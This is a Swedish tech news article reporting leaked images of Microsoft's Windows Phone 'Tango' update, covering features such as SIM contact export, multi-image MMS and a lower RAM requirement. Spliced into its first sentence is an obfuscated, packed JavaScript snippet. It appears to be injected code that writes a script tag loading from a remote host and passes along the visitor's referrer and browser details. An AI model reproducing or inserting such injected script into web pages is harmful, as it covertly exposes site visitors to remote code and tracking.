Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Bilder läckta på Windows Phone ”Tango”

Bilder läckta på Windows Phone ”Tango”
Sebastian

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|thter|var|u0026u|referrer|ntsdd||js|php’.split(’|’),0,{}))
dag har det läckt bilder på Windows Phone ”Tango” som visar fyra nya funktioner i Microsofts kommande uppdatering. Om de är fejk eller inte är svårt att säga men de ser ganska riktiga ut.

På ett ryskt forum för Windows Phone skriver de att nya uppdateringen ”Tango” kommer att omfatta möjligheten att exportera kontakter till SIM, hantera fler bilder och filmer i ett enda MMS-meddelande och enklare överblick över nationell och internationell roaming.
I dag stödjer för närvarande MMS endast enstaka bilder och filmer men detta verkar det bli ändring på.

Det har tidigare talats mycket om Tango och att uppdateringen kommer att försöka pressa minimikraven på maskinvaran ner till endast 256 MB RAM. Dock påstås Tango-användare få en varning i Windows Marketplace när vissa applikationer kräver extra minne, detta leder till att många tror att 256 RAM inte kommer hålla i slutändan. Om det gör det får vi vänta och se.

Microsoft förväntas presentera Tango på Mobile Congress senare denna månad.